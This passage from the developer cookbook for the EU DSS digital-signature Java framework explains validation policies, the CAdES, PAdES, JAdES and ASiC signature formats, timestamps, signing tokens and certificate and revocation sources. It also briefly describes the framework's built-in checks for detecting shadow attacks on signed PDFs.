policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=validationPolicy]\n----\n\n==== XML policy structure\n\nThe validation policy allows to define different behavior for various validating token types or signature formats. The following groups are considered:\n\n * `ContainerConstraints` - defines rules for processing of ASiC containers validation;\n * `SignatureConstraints` - defines rules for signature basic building blocks processing and the related certificate chain;\n * `CounterSignatureConstraints` - allows to define custom rules for counter signature processing;\n * `Timestamp` - defines rules for timestamp validation;\n * `Revocation` - defines rules for revocation data validation;\n * `Cryptographic` - defines common rules for cryptographic validation of used algorithms. The general constraints are used when no cryptographic constraints are defined for a particular token type;\n * `Model` - defines the way of a certificate chain processing;\n * `eIDAS` - defines rules for validation of Trusted Lists.\n\n==== Constraints\n\nEach constraint defined in the policy forces an execution of a relevant check in the validation process.\n\nNOTE: If a constraint is missing in the policy - the check is not processed.\n\nThe following constraint types are supported:\n\n * `LevelConstraint` - a simple constraint type with a defined processing `Level`;\n * `MultiValuesConstraint` - allows to define a set of accepted values relatively to the using constraint.\n\n==== Level\n\nThe `Level` attribute of a constraint defines a validation process behavior in case of a check failure. While used, the following behaviors apply in case of a check failure:\n\n * `FAIL` - brakes the validation process and returns the relevant indication;\n * `WARN` - continues the validation process and returns a warning message to the validation process output;\n * `INFORM` - continues the validation process and returns an information message to the validation process output;\n * `IGNORE` - processes the check in a silent mode (equivalent to a not defined constraint).\n\n==== Multi Values Constraint\n\nWhen using the `MultiValuesConstraint`, a list of acceptable values shall be defined in the list of `<Id>...<\/Id>` elements, one for each accepted value. While doing, the following rules apply:\n\n * Empty list of values -> accept only empty values for the item in question, fails otherwise;\n * `\"*\"` constraint value -> accepts all values, reject empty list of values;\n * Custom values -> accepts only item values matching the constraint.\n\n==== Cryptographic constraints\n\nCryptographic constraints define a list of acceptable cryptographic algorithms and their expiration dates when needed. The following settings are possible:\n\n * `AcceptableEncryptionAlgo` - defines a list of acceptable encryption algorithms. All tokens and signatures using other algorithms will be rejected.\n * `MiniPublicKeySize` - defines the minimal allowed public key size to be used with the defined encryption algorithms. An algorithm with a key size less than the defined one will be rejected. The minimal key size if required to be defined for an encryption algorithm, otherwise all used key sizes will be rejected.\n * `AcceptableDigestAlgo` - defines a list of acceptable digest algorithms. All tokens and signatures using other algorithms will be rejected.\n * `AlgoExpirationDate` - defines expiration dates for the algorithms. The algorithm is rejected when it is used after the defined date. If the algorithm expiration date is not defined, or set to null, the algorithm is treated as reliable for an unlimited time.\n\n==== The default XML policy\n\nThe default XML validation policy is present below.\n\n.constraint.xml (default policy is provided in dss-policy-jaxb module)\ninclude::_samples\/constraint.adoc[]\n\n== CAdES signature (CMS)\n\nTo familiarize yourself with this type of signature it is advisable to read the following document:\n\n* CAdES Specifications (cf. <<R02>>)\n\nTo implement this form of signature you can use the XAdES examples. You only need to instantiate the CAdES object service and change the SignatureLevel parameter value. Below is an example of the CAdES-Baseline-B signature:\n\n[source,java,indent=0]\n.Signing a file with CAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlCadesBTest.java[tags=demo]\n----\n\n== PAdES signature (PDF)\n\nThe standard ISO 32000-1 (cf. <<R06>>) allows defining a file format for portable electronic documents. It is based on PDF 1.7 of Adobe Systems. Concerning the digital signature it supports three operations: \n\n * Adding a digital signature to a document,\n * Providing a placeholder field for signatures,\n * Checking signatures for validity.\n\nPAdES defines eight different profiles to be used with advanced electronic signature in the meaning of European Union Directive 1999\/93\/EC (cf. <<R07>>):\n\n * PAdES Basic - PDF signature as specified in ISO 32000-1 (cf. <<R06>>). The profile is specified in ETSI EN 319 142 (cf. <<R03>>).\n * PAdES-BES Profile - based upon CAdES-BES as specified in ETSI EN 319 122 (cf. <<R02>>) with the option of a signature time-stamp (CAdES-T).\n * PAdES-EPES profile - based upon CAdES-EPES as specified in ETSI EN 319 122 (cf. <<R02>>). This profile is the same as the PAdES - BES with the addition of a signature policy identifier and optionally a commitment type indication.\n * PAdES-LTV Profile - This profile supports the long term validation of PDF Signatures and can be used in conjunction with the above-mentioned profiles.\n * Four other PAdES profiles for XML Content.\n\nTo familiarize yourself with this type of signature it is advisable to read the documents referenced above.\n\nBelow is an example of code to perform a PAdES-BASELINE-B type signature:\n\n[source,java,indent=0]\n.Signing a PDF file with PAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBTest.java[tags=demo]\n----\n\nIn order to add a timestamp to the signature (PAdES-T or LTA), a TSP source must be provided to the service.\n\nTo create PAdES-BASELINE-B level with additional options: signature policy identifier and optionally a commitment type indication, please observe the following example in code 5.\n\nAll these parameters are optional.\n\n[source,java,indent=0]\n.Defining a Signature Policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBTest.java[tags=policy]\n----\n\nThe extension of a signature of the level PAdES-BASELINE-B up to PAdES-BASELINE-LTA profile will add the following features:\n\n * Addition of validation data to an existing PDF document which may be used to validate earlier signatures within the document (including PDF signatures and time-stamp signatures). \n * Addition of a document time-stamp which protects the existing document and any validation data. \n * Further validation data and document time-stamp may be added to a document over time to maintain its authenticity and integrity.\n\n=== PAdES Visible Signature\n\nThe framework also allows creation of PDF files with visible signature as specified in ETSI EN 319 142 (cf. <<R03>>). In the `SignatureParameters` object, there's a special attribute named `SignatureImageParameters`. This parameter allows you customize the visual signature (with text, with image or with image and text).\nBelow there is an example of code to perform a PADES-BASELINE-B type signature with a visible signature:\n\n[source,java,indent=0]\n.Add a visible signature to a PDF document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=parameters-configuration;sign]\n----\n\nAdditionally, DSS also allows you to insert a visible signature to an existing field :\n\n[source,java,indent=0]\n.Add a visible signature to an existing field\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=select-pdf-signature-field]\n----\n\nIn case of placing an image or text to an existing field, the visible signature will fill out the whole available area of the field.\n\n==== Visible signature parameters (image and text)\n\nThis chapter introduces existing parameters for creation of visible signatures with DSS.\nDSS has three implementations for visible signature drawing:\n\n * *OpenPDF (iText)* - supports separate image and text drawing;\n * *PDFBox Default* - supports separate image and text drawing, as well as a joint drawing of image and text together. Transforms text to an image;\n * *PDFBox Native* - supports separate image and text drawing, as well as a joint drawing of image and text together. Prints text in a native way, that increases quality of the produced signature.\n\n===== Positioning\n\nDSS provides a set of functions allowing to place the signature field on a specific place in the PDF page :\n\n[source,java,indent=0]\n.Visible signature positioning\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=positioning]\n----\n\n===== Dimensions\n\nDSS framework provides a set of functions to manage the signature field size :\n\n[source,java,indent=0]\n.Visible signature dimensions\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=positioning]\n----\n\n===== Text Parameters\n\nThe available implementations allow placing of a visible text to a signature field :\n\n[source,java,indent=0]\n.List of available visible text parameters\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=text]\n----\n \n===== Text and image combination\n\nDSS provides a set of functions to align a text respectively to an image. The parameters must be applied to a 'SignatureImageTextParameters' object :\n\n[source,java,indent=0]\n.Combination of text and image parameters\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=textImageCombination]\n----\n \nThe result of applying the foregoing transformations is provided on the image below:\n\nimage::visual-sig-text-parameters.jpg[]\n\n==== Fonts usage\n\nSince version 5.5, DSS supports two types of fonts. The custom font must be added as an instance of `DSSFont` interface to a `SignatureImageTextParameters` object.\n`DSSFont` interface has following common implementations:\n\n * `DSSFileFont` for using of physical fonts, which must be embedded to the produced PDF document. To create an instance of the class, you must pass to a `DSSFileFont` constructor an object of `DSSDocument` type or InputStream of the font file;\n * `DSSJavaFont` for using of logical fonts (default Java fonts). The logical Java fonts allow you to significantly reduce the document size, because these fonts cannot be embedded to the final PDF document. Be aware, because of the fact, using of logical fonts does not allow producing PDF documents satisfying the PDF\/A standard. To create an instance of this class, you should pass as an input a `java.awt.Font` object or target font parameters (name, style, size).\n\nWARNING: Logical fonts may have different implementations depending on a used PAdES Visible signature service or Operating System (OS). Keep this in mind when switching an implementation or system environment.\n\nAs well as classes allowing to define native fonts for used implementations (available since DSS 5.7):\n\n * `ITextNativeFont` to be used with `ITextSignatureDrawerFactory`;\n * `PdfBoxNativeFont` to be used with `PdfBoxNativeObjectFactory`.\n\nYou can create a custom font as following (for a physical font):\n\n[source,java,indent=0]\n.Add a custom font as a file\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=font]\n----\n\nFor a logical font:\n\n[source,java,indent=0]\n.Java font usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleExistingTest.java[tags=font]\n----\n\nFor a native font:\n\n[source,java,indent=0]\n.Native font usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=nativeFont]\n----\n\nBy default, DSS uses a Google font : 'PT Serif Regular' (its physical implementation).\n\nNOTE: 'Native PDFBox Drawer' implementation supports only one of the following fonts: SERIF, SANS-SERIF, MONOSPACED, DIALOG and DIALOG_INPUT.\n\n=== Shadow attack detection\n\n\"Shadow attack\" is a class of attacks on a signed PDF document that constitutes a change of a visual content of a document after the signature has been made. Due to a structure of PDF document, the signature stays cryptographically valid even after the content's modification has been taken place. There are no algorithms to detect the malicious change with 100% guarantee. For more information, please refer to https:\/\/pdf-insecurity.org\/[the website].\n\nSince v5.8, DSS provides a set of own utils to detect the \"shadow attack\" on a signed PDF document. The following algorithms have been introduced:\n\n * `Page amount difference` - the validation tool compares the number of pages between the obtained PDF and signed revision. If the numbers do not match, the validation fail. The validation level can be configured within the <<validationPolicy>> with the constraint `<PdfPageDifference>`.\n * `Annotations overlap` - DSS checks if any annotation overlaps occurred. The overlapping is potentially dangerous, because some annotations can cover a visual content, e.g. forms and signature fields. The validation level can be configured with the constraint `<PdfAnnotationOverlap>`.\n * `Visual difference` - DSS verifies the visual difference between the provided document and signed revision, excluding the newly created annotations (between the validating revisions). The validation level can be configured with the constraint `<PdfVisualDifference>`.\n\n== JAdES signature (JWS)\n\nSince v5.8, DSS includes a possibility of creation and validation of JSON Advanced signatures.\n\nJSON format for AdES Signatures (cf. [R05]) represents an extension of JSON Web Signatures (JWS) as specified in https:\/\/tools.ietf.org\/html\/rfc7515[IETF RFC 7515].\n\nWARNING: The implementation is based on a draft of the standard ETSI TS 119 182-1. Some modifications can occur in future releases.\n\nA typical example of a JAdES signature creation is represented below:\n\n[source,java,indent=0]\n.Signing a file with JAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlJadesBTest.java[tags=demo]\n----\n\nThe specific parameters for JAdES signature are described in the next sections.\n\n=== JWS Serialization type\n\nA JWS signature can be represented in different forms which are supported by the JAdES as well:\n\n * `COMPACT_SERIALIZATION` represents a compact, URL-safe serialization. It has no JWS Unprotected Header, therefore only JAdES-BASELINE-B level is possible with the format.\n * `JSON_SERIALIZATION` represents a JSON object with a collection of signatures inside the `signatures` header that allows a parallel signing. It allows JAdES-BASELINE-T\/-LT\/-LTA signature extension levels.\n * `FLATTENED_JSON_SERIALIZATION` represents a JSON object with a single signature container. It allows JAdES-BASELINE-T\/-LT\/-LTA signature extension levels.\n\n[source,java,indent=0]\n.JWS Serialization type usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlJadesBTest.java[tags=serialization]\n----\n\n=== JAdES Signature Packaging\n\nJAdES signatures allow two types of JWS Payload (signed data) inclusion: `ENVELOPING` and `DETACHED`.\n\n==== Enveloping packaging\n\nWith `ENVELOPING` packaging the JWS Payload is enveloped into the JAdES Signature. The type only allows signing one document.\n\n==== Detached packaging\n\nA simple JWS signature allows a `DETACHED` packaging by omitting the JWS Payload in the created signature. For the validation process the detached content shall be provided and it is treated in the same way as attached.\n\nTo create a such signature, the parameter `SigDMechanism.NO_SIG_D` shall be set. The solution allows signing of only one document.\n\nThe JAdES standard [R05] provides a possibility for signing of multiple documents withing one signature in a detached way.\n\nThe following mechanisms are possible:\n\n * `HTTP_HEADERS` is used to sign an HTTP request. The signature may explicitly sign several HTTP headers (represented by the class `HTTPHeader`), as well as the HTTP message body (see the `HTTPHeaderDigest` class).\n\n[source,java,indent=0]\n.Configuration for signing with detached mechanism HttpHeaders\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignHttpHeadersJadesBTest.java[tags=demo]\n----\n\n * `OBJECT_ID_BY_URI` can be used for signing of multiple documents. The signed files are dereferenced by URIs and their content is concatenated for generation of the JWS Payload.\n\n * `OBJECT_ID_BY_URI_HASH` similarly provides a possibility to sign multiple documents, by signing the computed digests of the original documents. The JWS Payload for this format stays empty.\n\n[source,java,indent=0]\n.Configuration for signing with detached mechanism ObjectIdByURIHash\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsJadesTTest.java[tags=demo]\n----\n\n=== Base64Url encoding\n\nThe `Base64Url` represents a Base64 encoded format with URI safe alphabet (see https:\/\/tools.ietf.org\/html\/rfc4648[RFC 4648]).\n\nJAdES signatures (as well as JWS) force some values to be Base64Url-encoded, while provides a possibility to customize the format for some of them.\n\nDSS provides options to configure encoding for the following elements:\n\n * JWS Payload can be represented as Base64Url encoded octets (by default), as well as can be present in its initial form (with the protected header `b64` set to `false`).\n\n[source,java,indent=0]\n.Use unencoded JWS Payload\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignHttpHeadersJadesBTest.java[tags=unencodedPayload]\n----\n\n * The components of the unsigned header `etsiU` can occur either as Base64Url encoded strings (by default), or as clear JSON objects.\n\nNOTE: All components inside the `etsiU` header shall be present in the same form (Base64Url encoded or as clear JSON).\n\nWARNING: The current version of DSS does not allow JAdES-BASELINE-LTA level creation for `etsiU` components in their clear JSON representation.\n\n[source,java,indent=0]\n.Represent EtsiU components as clear JSON instances\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsJadesTTest.java[tags=clearEtsiU]\n----\n\n== ASiC signature (containers)\n\nWhen creating a digital signature, the user must choose between different packaging elements, namely enveloping, enveloped or detached. This choice is not obvious, because in one case the signature will alter the signed document and in the other case it is possible to lose the association between the signed document and its signature. That's where the standard ETSI EN 319 162 (cf. <<R04>>) offers a standardized use of container forms to establish a common way for associating data objects with advanced signatures or time-stamp tokens.\n\nA number of application environments use ZIP based container formats to package sets of files together with meta-information. ASiC technical specification is designed to operate with a range of such ZIP based application environments. Rather than enforcing a single packaging structure, ASiC describes how these package formats can be used to associate advanced electronic signatures with any data objects.\n\nThe standard defines two types of containers; the first (ASiC-S) allows you to associate one or more signatures with a single data element. In this case the structure of the signature can be based (in a general way) on a single CAdES signature or on multiple XAdES signatures or finally on a single TST; the second is an extended container (ASiC-E) that includes multiple data objects. Each data object may be signed by one or more signatures which structure is similar to ASiC-S. This second type of container is compatible with OCF, UCF and ODF formats.\n\nFor the moment the DSS framework has some restrictions on the containers you can generate, depending on the input file. If the input file is already an ASiC container, the output container must be the same type of container based on the same type of signature. If the input is any other file, the output does not have any restriction.\n\n.ASiC containers\n|===\n|Input |Output\n\n|ASiC-S CAdES |ASiC-S CAdES\n\n|ASiC-S XAdES |ASiC-S XAdES\n\n|ASiC-E CAdES |ASiC-E CAdES\n\n|ASiC-E XAdES |ASiC-E XAdES\n\n|Binary |ASiC-S CAdES, ASiC-S XAdES, ASiC-E CAdES, ASiC-E XAdES\n|===\n\nThis is an example of the source code for signing a document using ASiCS-S based on XAdES-B:\n\n[source,java,indent=0]\n.Sign a file within an ASiC-S container\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignOneFileWithASiCSBTest.java[tags=demo]\n----\n\nThis is another example of the source code for signing multiple documents using ASiCS-E based on CAdES:\n\n[source,java,indent=0]\n.Sign multiple files within an ASiC-E container\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignMultipleDocumentsWithASiCSEWithCAdESTest.java[tags=demo]\n----\n\nPlease note that you need to pass only few parameters to the service. Other parameters, although are positioned, will be overwritten by the internal implementation of the service. Therefore, the obtained signature is always based on CAdES and of DETACHED packaging.\n\nIt is also possible with the framework DSS to make an extension of an ASiC container to the level XAdES-BASELINE-T or -LT.\n\n== Counter signatures\n\nSince v5.8 DSS allows producing of counter signatures according to the corresponding AdES formats.\n\nNOTE: Counter signature does not provide a Proof Of Existence for a signed signature! Use signature extension \/ timestamping for this purpose.\n\nThe following formats are supported for the counter signature creation:\n\n * `XAdES` - multiple, nested and extended counter signatures (up to LTA level) are allowed;\n * `CAdES` - B-level counter signatures are allowed, as well as multiple counter signatures;\n * `JAdES` - multiple, nested and extended signatures (up to LTA level) are allowed;\n * `ASiC` - counter signatures are allowed according to the used format (XAdES or CAdES).\n\nIn order to create a counter signature, the DSS Identifier (or XML Id for XAdES) of the target signature you want to sign shall be provided within the parameters. The example below represents a counter signature creation:\n\n[source,java,indent=0]\n.Counter signature creation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/CounterSignXadesBTest.java[tags=demo]\n----\n\n== Various parameters\n\n[[signaturePolicy]]\n=== Signature policy\n\nWith the new standards the policy handling is linked to -B level. The old -EPES level is not used anymore by the framework. This does not alter the structure of the old signature but only modifies how to control the process of its creation.\n\nThe DSS framework allows you to reference a signature policy, which is a set of rules for the creation and validation of an electronic signature. It includes two kinds of text:\n\n* In a human readable form:\nIt can be assessed to meet the requirements of the legal and contractual context in which it is being applied.\n\n* In a machine processable form:\nTo facilitate its automatic processing using the electronic rules.\n\nIf no signature policy is identified then the signature may be assumed to have been generated or verified without any policy constraints, and hence may be given no specific legal or contractual significance through the context of a signature policy.\n\nThe signer may reference the policy either implicitly or explicitly. An implied policy means the signer follows the rules of the policy but the signature does not indicate which policy. It is assumed the choice of policy is clear from the context in which the signature is used and SignaturePolicyIdentifier element will be empty. When the policy is not implied, the signature contains an ObjectIdentier that uniquely identifies the version of the policy in use. The signature also contains a hash of the policy document to make sure that the signer and verifier agree on the contents of the policy document.\n\nThis example demonstrates an implicit policy identifier. To implement this alternative you must set SignaturePolicyId to empty string.\n\n[source,java,indent=0]\n.XAdES with implicit policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBImplicitPolicyTest.java[tags=demo]\n----\n\nAn XML segment will be added to the signature's qualified and signed properties:\n\ninclude::_samples\/xades-implicit-policy.adoc[]\n\nThe next example demonstrates an explicit policy identifier. This is obtained by setting -B profile signature policy and assigning values to the policy parameters. The Signature Policy Identifier is a URI or OID that uniquely identifies the version of the policy document. The signature will contain the identifier of the hash algorithm and the hash value of the policy document. The DSS framework does not automatically calculate the hash value; it is to the developer to proceed with the calculation using for example java.security.MessageDigest class (rt.jar). It is important to keep the policy file intact in order to keep the hash constant. It would be wise to make the policy file read-only. See also chapter 7 for further information.\n\n[source,java,indent=0]\n.XAdES with explicit policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBExplicitPolicyTest.java[tags=demo]\n----\n\nThe following XML segment will be added to the signature qualified & signed properties (<QualifyingProperties><SignedProperties>):\n\n.XAdES Signature Policy element\ninclude::_samples\/xades-explicit-policy.adoc[]\n\n=== Signature Policy Store\n\nSince v5.8 DSS provides a possibility of incorporation of a Signature Policy Store element as an unsigned property to the existing signature file.\n\nThe following signature formats support the Signature Policy Store addition:\n\n* XAdES (as well as ASiC with XAdES);\n* CAdES (as well as ASiC with CAdES);\n* JAdES.\n\nNOTE: Being an unsigned component the Signature Policy Store is not protected by a digital signature, unlike a Signature Policy Identifier incorporated into the signed properties.\n\nBefore incorporating of a Signature Policy Store, you need to ensure the target signature contains the matching Signature Policy Identifier element (see ch. <<signaturePolicy>>).\n\nAn example of a Signature Policy Store creation is available below:\n\n[source,java,indent=0]\n.Add SignaturePolicyStore\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBExplicitPolicyTest.java[tags=addSPS]\n----\n\n=== Trust anchor inclusion policy\n\nIt is possible to indicate to the framework if the certificate related to the trust anchor should be included to the signature or not. The setter #setTrustAnchorBPPolicy of the BLevelParameters class should be used for this purpose.\n\nThis rule applies as follows: when -B level is constructed the trust anchor is not included, when -LT level is constructed the trust anchor is included.\n\nNOTE: When trust anchor baseline profile policy is defined only the certificates previous to the trust anchor are included when -B level is constructed.\n\n== Timestamps\n\n=== Timestamp creation\n\nSince DSS 5.6 the framework allows an independent document timestamping (without a signature). The following Document Signature Services support the timestamping :\n\n * `PAdESService` - adds a timestamp to a PDF document;\n * `ASiCWithCAdESService` - creates a timestamped ASiC container with provided documents.\n\n[source,java,indent=0]\n.PDF timestamping\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/timestamp\/TimestampPDFTest.java[tags=creation]\n----\n\n=== Timestamp validation\n\nAs well as a single timestamp creation, DSS provides a validation service for timestamped documents. The timestamp validation process represents \"5.4 Time-stamp validation building block\" (cf. <<R09>>). The validation process is identical to <<signatureValidation>> process. An appropriate validator will be selected automatically. In total, DSS supports timestamp-alone validation for the following file formats:\n\n * Detached CMS timestamp (`DetachedTimestampValidator`) - a detached signed content must be provided (or its digest);\n * PDF document (`PDFDocumentValidator`);\n * ASiC CAdES container with a timestamp (`ASiCWithCAdESTimestampValidator`).\n\nThe validation process can be run with the following inputs :\n\n[source,java,indent=0]\n.Timestamped document validation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/timestamp\/TimestampPDFTest.java[tags=validation]\n----\n\nThe produced reports use the same structure as for <<signatureValidation>>.\n\n==== Timestamp qualification\n\nDSS is also able to determine a qualification level of a timestamp, if a relative information about TrustServiceProviders is provided to a certificate verifier (loaded automatically to a trusted certificate source with <<tlValidationJob>>) (cf. <<R14>>).\n\nThree qualification levels are supported by DSS and can be obtained :\n\n * `QTSA` (issued from a granted trust service with TSA\/QTST type at the timestamp production time);\n * `TSA` any other from a known trust anchor;\n * `N\/A` for others.\n\nAn example of a produced Detailed Report you can see below:\n\n.Timestamp Detailed Report\ninclude::_samples\/timestamp-detailed-report-example.adoc[]\n\n== Available implementations of DSSDocument\n\nDSS allows creation of different kinds of DSSDocument : \n\n * `InMemoryDocument` : fully loads in memory. This type of DSSDocument can be instantiated with an array of bytes, an InputStream,...\n * `FileDocument` : refers an existing File\n * `DigestDocument` : only contains pre-computed digest values for a given document. That allows a user to avoid sending the full document (detached signatures). \n \n[source,java,indent=0]\n.DigestDocument\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/DigestDocumentTest.java[tags=demo]\n----\n\n== Management of signature tokens\n\nThe DSS framework is able to create signatures from PKCS#11, PKCS#12 and MS CAPI. Java 6 is inherently capable of communicating with these kinds of KeyStores. To be independent of the signing media, DSS framework uses an interface named SignatureTokenConnection to manage different implementations of the signing process. The base implementation is able to sign a stream of the data in one step. That means that all the data to be signed needs to be sent to the SSCD. This is the case for MS CAPI. As to the PKCS#11 and PKCS#12, which give to the developer a finer control in the signature operation, the DSS framework implements the AsyncSignatureTokenConnection abstract class that permits to execute the digest operation and signature operation in two different threads or even two different hardwares.\n\nThis design permits also other card providers\/adopters to create own implementations. For example, this can be used for a direct connection to the Smartcard through Java 6 PC\/SC.\n\n=== PKCS#11\n\nPKCS#11 is widely used to access smart cards and HSMs. Most commercial software uses PKCS#11 to access the signature key of the CA or to enrol user certificates. In the DSS framework, this standard is encapsulated in the class Pkcs11SignatureToken.\n\n[source,java,indent=0]\n.Pkcs11SignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PKCS11Snippet.java[tags=demo]\n----\n\n=== PKCS#12\n \nThis standard defines a file format commonly used to store the private key and corresponding public key certificate protecting them by password. \n\nIn order to use this format with the DSS framework you have to go through the class Pkcs12SignatureToken. \n\n[source,java,indent=0]\n.Pkcs12SignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PKCS12Snippet.java[tags=demo]\n----\n \n=== MS CAPI\n\nIf the middleware for communicating with an SSDC provides a CSP based on MS CAPI specification, then to sign the documents you can use MSCAPISignatureToken class.\n\n[source,java,indent=0]\n.MSCAPISignatureToken usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/MSCAPISnippet.java[tags=demo]\n----\n\n=== Other Implementations\n\nAs you can see, it is easy to add another implementation of the SignatureTokenConnection, thus enabling the framework to use other API than the provided three (PKCS#11, PKCS#12 and MS CAPI). For example, it is likely that in the future PC\/SC will be the preferred way of accessing a Smartcard. Although PKCS#11 is currently the most used API, DSS framework is extensible and can use PC\/SC. For our design example we propose to use PC\/SC to communicate with the Smartcard.\n\n== Management of certificates sources\n\nThe validation of a certificate requires the access to some other certificates from multiple sources like trusted lists, trust store, the signature itself: certificates can be contained inside or any other source. \nWithin the framework, an X509 certificate is wrapped through the class:\n\n * `eu.europa.esig.dss.model.x509.CertificateToken`\n \nThis encapsulation helps make certificate handling more suited to the needs of the validation in the context of trust. The framework associates two internal identifiers to the certificate : the DSS Id based on the certificate binary (unique for each certificate) and the Entity Id based on its public key (common to cross-signed certificates).\n\nCertificate tokens are grouped into sources. A certificate token can be declared in several sources. The class that models a source is called:\n\n * `eu.europa.esig.dss.spi.x509.CertificateSource`\n \nThis class stores all extracted\/injected certificates for a specific source (Signature, OCSP Response, Trust store, Trusted-list,...). All source types are specified in the enumeration : \n \n * `eu.europa.esig.dss.enumerations.CertificateSourceType`\n \nThis information is used, for example, to distinguish between the certificate from a trusted source and the others. A source has one and only one type, but a certificate token can be found in multiple sources. \nThe DSS framework supplies some standard implementations, but also gives the possibility to implement owner solutions. Among the standard solutions you can find:\n\n * `eu.europa.esig.dss.spi.x509.CommonCertificateSource`\n \nThis is the superclass of almost of the certificate sources. It stores the extracted certificates and implements the common methods from the `CertificateSource` to retrieve certificate(s) by subject, public key, subject key identifier (ski),...\n\nIt also exposes the method CommonCertificateSource#addCertificate which gives the possibility to add manually any CertificateToken as a part of this source.\n\n * `eu.europa.esig.dss.spi.x509.CommonTrustedCertificateSource`\n \nThe CommonTrustedCertificateSource is a certificate source for trusted certificates. All added certificates are marked as trust anchors and no revocation data are required for these certificates.\n\n * `eu.europa.esig.dss.validation.SignatureCertificateSource`\n \nThis class and its sub-classes are used to extract and collect certificates from signatures \/ timestamps. It also has methods to retrieve certificates \/ certificate references by their origin (eg : SigningCertificate attribute, DSS Dictionary,...).\n\n * `eu.europa.esig.dss.spi.tsl.TrustedListsCertificateSource`\n \nCertificates coming from the list of Trusted Lists. This class inherits of `CommonTrustedCertificateSource` and gives the mechanism to define the set of trusted certificates (trust anchors). They are used in the validation process to decide if the prospective certificate chain has a trust anchor. See chapter <<tlValidationJob>> to get more information about trusted lists loading (e.g. EU Trusted List).\n\n * `eu.europa.esig.dss.spi.x509.ListCertificateSource`\n \nThis class follows the composite design pattern with a list of CertificateSources. That's used in the validation to retrieve all sources from the signatures \/ timestamps \/ revocation data \/ trusted lists \/... It contains some methods which check over all sources to retrieve certificates or verify if a certificate is trusted.\n\n== Management of CRL and OCSP sources\n\nA CRL is a time-stamped list identifying revoked certificates. It is signed by a Certificate Authority (CA) and made freely available in a public repository. Each revoked certificate is identified in a CRL by its certificate serial number. \n\nThe Online Certificate Status Protocol (OCSP) is an Internet protocol used for obtaining the revocation status of an unique X.509 digital certificate. \n\nFor every certificate, the validity has to be checked via CRL or OCSP responses. The information may originate from different CRLSources or OCSPSources: \nFor easing the usage of such sources, DSS implements a CRLSource and OCSPSource interfaces (which inherit from RevocationSource), which offer a generic, uniform way of accessing CRL and OCSP sources. Furthermore, a caching mechanism can be easily attached to those sources, optimizing the access time to revocation information by reducing network connections to online servers.\n\nThe interface CRLSource defines the method which returns CRLToken for the given certificate\/issuer certificate couple:\n\n[source,java,indent=0]\n.CRLSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/CRLSourceSnippet.java[tags=demo]\n----\n\nThe interface OCSPSource defines the method which returns OCSPToken for the given certificate\/issuer certificate couple:\n\n[source,java,indent=0]\n.OCSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/OCSPSourceSnippet.java[tags=demo]\n----\n\nWe use these classes during the certificate validation process through \"validationContext\" object (based on ValidationContext class) which is a \"cache\" for one validation request that contains every object retrieved so far. This object in turn instantiates a \"verifier\" based on `RevocationDataLoadingStrategy` class whose role is to fetch revocation data by querying an OCSP or CRL source in the defined order and return the succeeded result.\nIn general, we can distinguish three main sources:\n\n * Offline sources (`OfflineRevocationSource`);\n * Online sources 